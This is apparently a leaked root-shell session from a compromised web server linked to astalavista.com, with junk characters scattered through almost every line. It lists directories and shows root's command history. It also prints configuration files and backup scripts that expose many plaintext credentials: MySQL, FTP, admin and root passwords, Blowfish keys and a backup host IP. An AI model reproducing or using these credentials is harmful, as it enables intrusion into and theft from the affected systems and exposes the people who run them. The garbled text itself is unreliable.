+ b: K3 @6 I, W- o) M' G0 A7 H#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #3 m* f( _$ Q& _2 n+ b z# ?1 R/ R) Y
# |__| [__ | |__| | |__| | | | [__ | |__| #
- d# `0 c# I9 ~% R9 O2 a8 r# | | ___] | | | |___ | | \/ | ___] | | | #
+ @( e0 l' ^' x+ ]# #& c+ `# [( V4 Y" B1 r
#####################################################. b" [1 z# g* U6 _
# #
4 Q' N! ?. z; b: N2 `, R9 m# Admin Contact - 链接标记support@secureservertech.com #
Y5 G; i$ S& Q2 a: m2 B# #8 o. A, F7 P8 b6 Q; u
# Available ShortCuts #1 f/ K; q8 ?/ m0 }# O6 q3 ]7 o
# #
5 q7 I- t0 J5 `( U. \ Z9 \6 |& w# nst - list active connections #$ w9 C0 U. n$ O0 b! _, U9 e% Y. _
# ddos - shows how many times each ip is connected #
) E7 z5 {% H% u7 t3 j! y( `# ltr - restart the webserver #
7 O* A; G% q4 C+ |# phpc - edit the php config file #5 @: v) Z; j! c& o
# htc - edit the webserver configuration file #" @$ T3 }6 H1 { N+ n9 z2 O( |
# up - uptime #, t9 v& H: B0 S" ^0 w+ P
# etd - edit the motd of the day file #
0 ]4 K2 A: q B6 `! G$ F# htr - start and restart apache if needed ## b/ n$ h% ^& `# m& A- V7 e$ c S) H) G
# syng - shows active SYN_RECV connections #
, g8 S! [; W9 a {! _# synd - syn flood blocker - “synd -h” for usage #, u1 K: j0 I0 b7 a
#####################################################
/ g, J+ j" m; S! b, p5 y# NOTES: #
- e8 b3 G$ A d0 L: c* ?# Last Upgrade - 12-08-2008 by JF #
; h9 Z1 b% Y, ~. q6 u3 W( j# My.cnf/Mysql Optimization - 1-28-09 #% u& b! A# w; `: o6 c
# #
9 v, Q$ |+ x [- r3 M7 c# #; f* r% O, v) r4 l1 n/ c+ t, `
# #% i3 S7 q* P! Q8 S7 g4 s8 z" O2 g
#####################################################
' |& O( D" H% E/ \& f" i+ X' d7 o& v/ U# _5 T& I: [
sh-3.2# lastlog | grep -v Never
" z" a* q4 d1 k1 {6 Y: eUsername Port From Latest; X9 I' H G. r* Y d3 c
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009! Q. R0 t0 o% y/ G! W
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
7 j) _1 S. [. h; Dcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
$ e: j g D* g1 \astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20099 U9 f' L X' V% F
9 O0 ^$ w' ?0 j/ f& x& `, R I+ A& }sh-3.2# ls -la: a7 c# n9 W/ U- {, ^% J, B
total 453376
- N/ P* B( l' x# {( R( }drwxr-x— 15 root root 4096 Jun 4 08:40 .. w$ w8 j( e E% I/ j
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! j# |3 v0 U5 X/ A7 E/ W3 d
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip, a* o# @! Z/ q( j- @
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
9 C. X0 i9 d- c5 C9 j* @) B7 o-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
, @" `, c) x# ~7 w$ [-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout P0 e* b2 C8 p2 F# V; h6 G# A; o
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
& s1 _+ L* S* N: O9 `+ N-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
! x1 g0 U; |: L-rwx—— 1 root root 1899 Oct 28 2007 bk.sh! I) X8 I- G3 j! ?% ?
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
* m: i8 x J) I2 U-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql+ N I) A7 O+ K0 K! @. D6 ^
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
8 q$ I( ]5 M4 Y8 f9 v0 H. g& O-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc# h( V& d V2 q
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
0 ]; `; O2 ], W/ x; o7 [1 Kdrwx—— 2 root root 4096 Oct 28 2007 .elinks
# L/ B9 X/ ^* o$ B+ T7 Kdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
4 P8 s& N* S7 K8 E# w( Z6 I% R. u-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2# {) i* Y! F( T# Z M1 a6 H
-rw——- 1 root root 0 Apr 16 13:19 .history
' r7 j+ M, Z5 r, |, v-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
. N! m. T$ i; g5 q-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
0 Q/ W9 y @2 f! t- M$ i-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
5 ]3 `( M, F) y& K-rw——- 1 root root 35 Jun 2 14:23 .lesshst% w1 o1 y# N7 K$ g
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp. N7 h8 F& z: Z5 f
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 c5 N6 z% M& _- M! v1 E( e6 h
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
- }8 M; z3 k1 t1 P-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz24 ~5 @0 g; L, C% M
-rwx—— 1 root root 760 Sep 18 2008 lp
& b* K$ e, g+ _ xdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
$ y R0 P" i; M9 E) L/ _-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz; m+ e9 m( P+ }+ r$ |
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.19 G8 k" {+ \ Y% w! E+ M
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
. B1 e% ^& ^7 s' g-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz% e2 @& R: n. x( n9 w
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
. f7 w' L8 Q. ?' [# x-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz+ W7 O, W4 `. G) l0 H* ?1 L: y, ]
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh+ Z5 E6 }$ E8 c6 n
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
* ?+ Z& N1 G8 S* C6 g/ j, B0 [$ {; S-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history' q& C3 g! P, c9 K4 e* [ t
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport# A( ~5 ~: V2 J X' |5 W- W
-rw——- 1 root root 41 May 20 2008 .mytop5 b1 o' L" \* q: n+ z
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
; V5 ^. u) W/ `$ U$ Z3 S. o( x-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz& C. n/ }# @( V) a, J
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
) ^! z, G7 f# b7 x! @' a! G-rw——- 1 root root 1462 Sep 21 2007 opt.php3 e1 H$ A# w+ g5 x
-rw-r–r– 1 root root 3371 Sep 22 2007 p
% J3 o4 N9 Z$ `" Z-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2% n0 p3 c' _) L+ p6 j9 O" F% i4 @4 _
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
# G; {# P4 n( d-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
$ w# ?7 F7 k" T, Y-rw-r–r– 1 root root 887 Nov 28 2007 server.key
, d) ]) B/ u/ Y" K9 t* Tdrwx—— 2 root root 4096 Oct 10 2008 .ssh
, o* \" W4 P# `; v4 ?-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
2 w, R3 R( r! H7 |4 r4 t# y-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc* c# u, u4 ^+ ]& i8 g
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip- }% r0 V7 E* J
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
) ^% P; m* R/ h# i: G6 k+ e; adrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
5 d8 ] ?2 Y% @-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh5 z/ u) i1 @. U6 i
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
4 S* |1 t9 D3 n-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
$ B9 j# ~8 k# M C-rw——- 1 root root 12997 May 16 2008 .viminfo
) J, w1 E9 O- {0 D# R& H) `! s( a; M
sh-3.2# cat .bash_history
" i$ ~) B, t1 Z ^5 S[snip]8 C j& Z9 c1 O; ~. Z t
wget cp4sst.com/sstlinux.tar.gz
( u6 O r. c% I8 l6 O% ^tar zxvf sstlinux.tar.gz# @2 m8 p6 Y3 | P
cd linux-2.6.27.10/ E3 s2 P) i8 Q$ Z# w
sh install.sh/ N8 A2 a4 V0 n: l
make bzImage ; make modules ; make modules_install ; make install
3 l& G5 {5 f# T/ ymake clean% ~# l8 [% X! a0 `' T
service mysqld restart
G& J) k. @8 k( x) c3 A[snip]
9 ^; U: S$ {; ?8 \8 acd /usr/sbin/% K" t( L& _: m5 ^, \; F, M/ ~
chmod 4777 traceroute
* E ~) k0 ^! D8 v. xchmod 4777 ping+ S: v% V: l7 e% B. d" M; Y
traceroute -I 链接标记[url]www.astalavista.ch[/url]* k1 i4 G! i% o) [& T! e" [
[snip]
# R* J8 T0 F' l: j+ T, Hvi /etc/csf/csf.conf
! f$ @3 ~- d6 i3 a% n2 I7 ptraceroute google.ch
2 C7 |2 n% d' @- e9 q; Rservice csf restart0 s1 t) g: G" p% `2 N. b. F. v
tracert google.ch
) Y* w- u! q( o' Wservice csf restart# W/ K, N( b/ i( W! R+ W: A/ E
traceroute 链接标记[url]www.google.ch[/url]
; k0 d6 a6 b( M) W8 D4 y5 l$ otracert 链接标记[url]www.google.ch[/url]3 R, \- D* t3 n. A4 [3 R$ v N3 X
traceroute 链接标记[url]www.google.ch[/url]4 Q3 I! P7 F2 k: Y8 N5 W% H) d
locate traceroute5 f/ f1 x$ q3 G, g0 W
chown 4755 /bin/traceroute5 i0 D! g8 O2 \0 l. P
chown 4777 /bin/traceroute
* q6 e9 s E+ }8 y1 ylocate ping5 e7 y- }) u: K5 W% I
chown 4755 /bin/ping1 V& Y* W* l. E% P- r, J
chown 4777 /bin/ping: w+ ^3 w" F: j: K" M5 r! }0 {
cd /bin/
, H, b* J( b+ ils -ali | grep ping
`5 K6 ]; h8 z# Cchown root ping
- K, B5 S2 K1 }3 V3 fchmod 4755 ping
/ x9 g' O2 z! d& p% b' A0 ^5 als -ali | grep traceroute
5 E z: E, t8 f+ r6 Qchown root traceroute |& D% \+ _6 |; G) y5 A/ t! h
chmod 4755 traceroute
% i5 M* l7 `) Z6 X' y1 uls -ali | grep traceroute
' T. s+ j* m$ u- btraceroute -I 链接标记[url]www.google.ch[/url]8 _% [& q! b/ X, L1 V- M' K
traceroute 链接标记[url]www.google.ch[/url]8 M5 e1 Q& l, I: ~% e: n
whois pmsantos.ch
* b0 M; K6 d" Y. D; {[snip]3 Y2 L5 n0 O! P3 ?
mysql -h com_contrexx2_live < /root/defaultp_ports.sql4 J% u' y( F( |( O8 a$ ~: \0 S
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql# E, _& U& g }
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
* ?+ _$ {& V% j( [/ a4 Y8 Umysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql" N1 y+ |% [5 `; P
top0 _& H" N5 X" A7 E' A" I, D' O6 i: \
ping ssth.ch
/ @& I9 _ l% i2 }, H; uping asdlkfaljgasd???ljg???lasj.ch# }& f: M q4 y
ping asdlkfaljgasdlasj.ch
) ^/ s$ t: W9 ^+ @5 u' gping 链接标记[url]www.ssth.ch[/url]. l. s1 ^) f5 P
ping ssth.ch
# `! ^# w" l' |$ O1 Cnslookup 链接标记[url]www.google.ch[/url]
6 @1 }* P2 |6 _9 xnslookup 链接标记[url]www.ssth.ch[/url]. l, z" H7 C W% S. U* V
man nslookup& y H$ ~0 w2 B
ping 链接标记[url]www.google.ch[/url]
2 b' z% K: k% @' c( o3 W- _nslookup 链接标记[url]www.google.ch[/url]2 A1 ^# P! Y+ B& h0 Z8 ^
nslookup 链接标记[url]www.google.ch[/url]
8 J4 \* N: \* Y, Y+ Q0 }4 E( k! @nslookup salfjasdlf.ch1 p% `: v% L4 S7 L0 j" c
[snip]: X& u2 }2 a3 b* i2 D* ^. c
openssl passwd -1 sadf
. z. x& }. }/ b+ |* v" W# P7 j$ uopenssl passwd -1 5cZNHstdTy3 B1 p) y4 V7 j7 d* v( V
mysql
( ~# q( I8 z( t4 L# I: vmysql; i7 a% l7 V6 v) c$ o
locate proftp
& c* ^9 E6 d. a9 Ovi /etc/proftpd.passwd0 ^3 D: x/ r* K/ t& z. Q) j
service proftpd restart
* E9 a4 o, G3 nlocate proftpd.conf. L" m- u! M. i0 W# Z4 H
vi /etc/proftpd.conf
5 m3 m5 {7 f# C/ M$ Y* T( ?3 mvi /etc/proftpd.passwd# i4 M; l! z+ K: J" G) P
service proftpd restart
# h5 D) ]- U* [/ t/ R# F[snip]" O- A7 r; P1 M0 F+ N7 n& W k! J
/bin/sh /home/com/backup_system/backup.sh
, L+ E; r3 k! atar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
+ {' A- _. S5 d6 S: f3 Wmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
1 S! {8 [! F. U! s4 T! {1 |+ Vmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql% W, e! D/ q; F" u& Q
ls -ali
8 E; K) \2 T% g9 `4 emysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
* J- D0 g# P$ Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
9 T4 Q- K. i& p8 ~+ i8 C# scrontab -l1 m5 x, [% [) r* S
crontab -l% O @& a! m$ @7 j) x+ H6 G* c
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
! N) [- j9 z. T9 _1 M0 x$ Q/home/com/public_html/modifications/cronjobs/exploits.sh7 O6 U I" b) v. y4 D M+ e
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
, `& h4 O4 L9 ltar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
9 C0 E8 B7 a3 Y/ Ucd lsws-4.0.3. `5 B% O- f8 B, Y8 c
sh install.sh% i6 `9 J' d/ X4 g" J) G- s
uptime9 N5 n! H i, P2 r8 d+ s. u' U
hdparm -tt /dev/sda6 H1 T h3 _% M
iostat
1 _0 `! S- u( _' Ayum install iostat
; N6 d$ U3 G- K' _9 Z- g$ s' Oiostat
5 ?3 G/ P4 s K& ]4 \& ^2 ywhereis iostat0 V, X! H/ H: b; o" t: E
yjm clean all
4 Y# {( f* }# W) Zyum clean all ; yum -y update
/ s6 r' c- L" F- Z& A" ?iostat
8 e- K V5 I. p1 t. H) byum install systat) o' B' J: j, U" e
rpm -qa | grep iostat
1 n5 y3 S/ F7 F' W9 F" l# q9 rrpm -qa | grep sysstat
. r$ N! a. _' R2 r* u" G! hrpm -qa | grep systat
* `( T" I# X Gdmesg -c
: a; \/ ]6 q4 ysysctl -p1 i3 a5 [+ ], Z) h" N+ k
uname -r7 r6 l+ g, ^$ ], I' C
cd /usr/src
4 b) l2 P% \0 q* H9 [" pwget nix101.com/kernels/sstlinux.tar.gz
2 l5 { Z/ ~7 X: L' ~shutdown -r now+ v$ J$ W8 x0 i; u
nano -w /boot/grub/grub.conf! v1 c- s' D& l/ K9 z: K+ f
0 J6 P) {& V8 f8 G3 v- `sh-3.2# cat .my.cnf
/ B! U7 f# w7 F d[client]
6 \" \, M3 u, v; ~) fuser=da_admin
) A: @5 M& g' K# Bpassword=X9dctmRH+ b9 V7 N9 ~4 Y3 s
9 [7 _0 c( c7 Y8 F
sh-3.2# cat /home/com/backup_system/backup.sh
1 S9 B) h3 u2 ^# A1 Q/ c$ k. v#!/bin/sh
5 y+ m+ V2 U- P& N: v4 p6 z#####################################################################" K+ U7 Q9 @6 c0 x* o3 V
# #
6 ]" Y8 a% \2 r# v1 p( X# incremental backup for astalavista.com #
! _; [7 x2 t# ?; S/ ?4 j" d# #4 \! g6 p; z/ ^ M% ^
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #1 z- m: U0 @- N: R0 {. c3 H
# #* D" Z; J/ r ^' G
#####################################################################
, [8 c4 ?1 k1 ?+ H O8 o[snip]
" L% H! q+ i6 q5 T1 T# a9 QPROG_DIR=”/home/com/backup_system”;8 O& T' k- ^; [6 e6 D# w
BACKUP_DIR=”/home/com/backups”;
- Q: f$ G9 o8 M) u# T; r) E- C4 QDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;- H9 K& v- p3 ~ K
# ftp for synology backup server% z1 @4 e* G, L3 U! t2 M
FTP_HOST=”212.254.194.163″;& h; e* f" U4 D" A+ v7 y6 \, S: Y" g
FTP_PORT=”21″;5 ]/ y- Y7 V; m! n. D7 A
FTP_USER=”astalavista.com”;
: r, }) B5 D9 o) i4 C; \' ^FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;- X, i% y: O- a, w w' g6 u
FTP_DIR=”/astalavista.com”;
( [. D7 [# o+ K7 }& X. J% m; Y! J# database' o2 {: W g7 _2 G: F: {% F
DB_HOST=”localhost”;, `% N1 G$ X" C' y
DB_USER=”contrexxuser2″;
- B' n8 u3 e9 X3 R5 i+ ~) m& TDB_PASS=”0fEYNZgXz1pKe”;
% r! i7 p/ k9 l9 h* U3 V7 h0 uDB_DATABASE1=”com_contrexx2_live”;
$ l- A0 E0 _. L3 J& TDB_DATABASE2=”com_contrexx2″;
5 R2 p. l+ R( X[snip]
4 O' G4 |1 t' J `3 m7 mftp -in $FTP_HOST $FTP_PORT <<EOF; q8 ]5 ~; e) h6 I
quote USER $FTP_USER0 j' s, ~, h0 e
quote PASS $FTP_PASS
8 Z @, l3 u' y5 j3 `$ J) c* E' [cd $FTP_DIR
! f4 u2 Y( q; u: d1 \( z! Dput $DB_FULLNAME-SQL_Dump.tar
5 H) N1 j4 ]" O' m2 W5 E& w) E0 gput $BACKUP_FULLNAME-Public_HTML.tar4 A- r2 R- L- D8 E J
close
$ r6 ~: B6 O# [bye. O5 x+ q0 P0 g& Y! K( u6 o. }" E9 W
EOF, X. P* M- O) N$ C3 r- {
' e& h( b$ ` R0 o; y
sh-3.2# cd /home
* Z8 C/ M6 p, ^2 W# dsh-3.2# ls -la
( U/ m! l* x$ l8 P& x6 a5 v% m/ Ctotal 120
# Y6 i3 p, ?" l. mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ." [7 K0 x* U# m
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 J+ |+ {3 X1 D( T+ {" ~" \drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
( v7 E8 N/ a2 L8 L } `-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
' V1 s/ J: t; @: A7 A+ d-rw——- 1 root root 8192 Jun 3 02:45 aquota.user+ U: Y. q# W0 g" Y: b" b
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
% T2 K9 v9 H8 z8 y4 x Hdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
) I6 I+ r' T2 {9 b* n& s: Idrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
5 u( J# u& L8 i% c- o7 Pdrwx–x–x 10 com com 4096 Apr 28 12:40 com% L7 o* v* I/ t: X+ L/ K d# @5 H
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
% ~9 w1 q3 O0 e0 J1 V. jdrwx—— 3 jon jon 4096 Sep 21 2007 jon- M X6 [- _" D5 Z4 O: O
drwx—— 2 root root 16384 Sep 11 2007 lost+found
% {$ e1 d7 R2 y# B0 r+ c0 adrwxr-xr-x 2 root root 4096 Sep 14 2007 my8 }& U, C6 v; m. \3 s1 C
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata0 b: Z2 ^8 B$ \1 v, `: T
drwx—— 2 jon jon 4096 Sep 15 2007 test1 H6 C8 _3 c% w3 p/ R6 u
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
5 g" |5 G* N! A; y1 I; r4 I1 W( c5 l: V5 W) q. c
sh-3.2# cd admin; \2 q) R8 D5 b" h- s
sh-3.2# ls -la* u2 y' u) m+ ?* C
total 1735896& h4 |- T; p8 j+ e" i& q ~# e1 j
drwx–x–x 9 admin admin 4096 Nov 28 2007 .% ~* G A( M% O' H1 t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 S9 r- W3 g# Z' o* N1 @
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
4 O* `) t2 ?( I! Gdrwx—— 2 admin admin 4096 Sep 28 2007 backups z! f# ^$ M% g4 Y
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history; I- \. d6 F1 j
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
" \" _0 ?2 H5 ]; g5 c# i-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
; [" U- K7 F4 b% \ ?* p* b-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc* U4 M7 u1 \* N1 i4 G: ?8 G
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups6 [ Q) e& Y8 n+ L
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
2 r8 |5 h" S9 _2 Y- [! Rdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap% n0 x7 a# K8 b
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
* h6 j3 r5 U8 y% Idrwx—— 2 admin admin 4096 Sep 21 2007 mail) M6 R( X2 b# a9 T
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr) q% X0 j! P& D* r9 v
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
% n# U& o% {/ w7 V# Z1 A-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow9 d* M5 }! g' _0 K0 u2 I
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
0 n, b) T b" j0 Gdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups3 ~' T* Z3 a/ G+ X( P
3 z7 p( j% V) |- fsh-3.2# .." H: r- e" x6 P7 P6 `* \# S1 t
sh-3.2# cd jon
* @& o6 o& i: Q: q6 ]# Csh-3.2# ls -la
+ \' T- }8 O2 s _, z: W0 `total 36' a" Y) A4 l& P* ]& E9 H
drwx—— 3 jon jon 4096 Sep 21 2007 .9 K- K ?8 Q. e6 m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( w. a) \+ m: M0 \% Z B) p! ?
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history! X7 {+ Y; O5 v' I7 W# Q
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
& g" r6 B# ~$ q- p B-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
8 ^0 L- V: n* P8 e-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc" @5 J3 r3 b. {
-rw-r–r– 1 root root 24 Sep 21 2007 info.php, K3 H ]3 S& j3 O5 t; X% j( E! Z
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html) F6 }7 p& r* [& L9 k& f
% }1 H4 f" B+ E4 H
sh-3.2# cd ..
; e; S6 O8 { Q: I$ Q* rsh-3.2# cd test2 r% b3 M7 e. O0 D% J. g" O# F
sh-3.2# ls -la
! K/ ~# L- P$ o& L: x/ y' [& r8 u. itotal 48
6 b! Y' T m# H% t6 `' ]drwx—— 2 jon jon 4096 Sep 15 2007 .
+ z$ r9 t( l4 G; `drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..0 S# d. q- u! K) y- A
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history6 a' |0 Y0 m7 J5 k8 a) ^
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout! ]' }' S4 R' q2 \
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile% _7 T. r: w% Z: o/ d0 l; ~! C
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc& |/ Y2 C5 @# U0 C8 S5 l0 _# G
sh-3.2# cat .bash_history
: v- E8 B0 s. O1 V/usr/bin/mysqladmin -u root password PoliuJhytg67
8 y9 V% I. _7 \
# @, s* m) B0 x U. r& _& M/ X6 r$ Dsh-3.2# cd ..: V5 W5 ?0 K' t$ F4 }
sh-3.2# cd astanet
! h% f% ~8 z( ]& e2 J# }sh-3.2# ls -la
, t) n( v5 G/ Y F$ v" qtotal 52- D) X! `" b5 q2 j, l6 l
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
$ E# X( l# y" ~2 ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 V( S, |# c0 _4 e0 p$ ^9 f
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
( J8 U/ v! y4 S: N2 F3 g-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history$ G R8 O1 O2 }8 a2 Z9 n
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
2 \4 i' e b0 X% p; _! j-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile; S' s& [4 L) ^5 M6 f- X" B
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
4 \5 C6 e2 H7 z0 a& D0 _0 cdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains7 _: _3 W7 ]* h& _8 U8 D; A
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap; X+ i/ t& k, X3 M3 g8 _3 }
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
) ]! @1 G( M w% l-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
# w* A S4 y# h/ u! P8 ~# `/ _: clrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
& W" G" t( h" f: N3 x5 ]) H-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
) }% O+ D. A) C& P& J
, H/ C/ x$ t, m! L4 y* ^sh-3.2# cd auth/$ W: z* L# M) J. t$ y, h8 t6 E
sh-3.2# ls -la& h6 K) E2 g* x3 j. K0 h
total 284 T5 U: e% j" Z: J+ d5 ^
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
7 z' Q5 l$ w$ E5 Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
8 [- R1 S$ a' y i- \-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
b4 \4 }" C: u, A# J( A. W-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php4 ^7 F$ ~* E# Q) |+ Y" S8 Y
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
" g% L1 y' c& L% k7 R-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
8 ~1 t& Q+ ?2 u- @5 \/ o! }% m-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd, u% W6 ~3 C7 ^( a
" k* A0 K4 r6 F3 b( l z; U( j T
sh-3.2# cat hackercontest.config.inc.php4 K6 I& v" ? s. W. ~
<?PHP# m& ?/ \( {* Y
// Variabeln f?r Verbindung zur Datenbank //
, I/ ]7 H$ m* Y* }2 V, h& l$conxHost = ‘localhost’; // MySQL hostname. C: U7 N5 \* X+ }) k$ q$ o
$conxUser = ‘hackercontest’; // MySQL user
5 j( o3 O4 x/ C& I: U; [$conxPassword = ‘K6m@7dUc’; // MySQL password9 C- j# Y4 h p9 |3 z$ ]3 i
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
" ]. m; l- U% l m?>
% m* a% U0 N/ A( V# msh-3.2# cat hosting.config.inc.php
5 J2 w9 I) R2 t/ g. E. W<?PHP
- D' B# f6 ~" L7 K1 _// Variabeln f?r Verbindung zur Datenbank //- r7 V9 R5 a! x: S9 p! }' f: E* F
$conxHost = ‘localhost’; // MySQL hostname
|% N) |- a7 J" G6 e0 l' T) n$conxUser = ‘hostinguser’; // MySQL user2 b7 ^% f7 ~/ T8 o8 H3 ~; B
$conxPassword = ‘cXvB3981′; // MySQL password
( E6 j6 u( l% w4 H$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish o \( |# U( P1 F2 m
?>" D8 X$ m w6 d2 z
5 }/ N: X* z, R, csh-3.2# cd ..
9 C& M9 }! z; ]* w4 }! Bsh-3.2# cd com
5 j9 o# P* C- fsh-3.2# ls -la9 a& }/ w- t0 Q( g
total 141208( h H) w _) \! N$ ?- I
drwx–x–x 10 com com 4096 Apr 28 12:40 .8 @+ k' k! t% R1 C* f; o$ k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' p- B' @) i# m# F
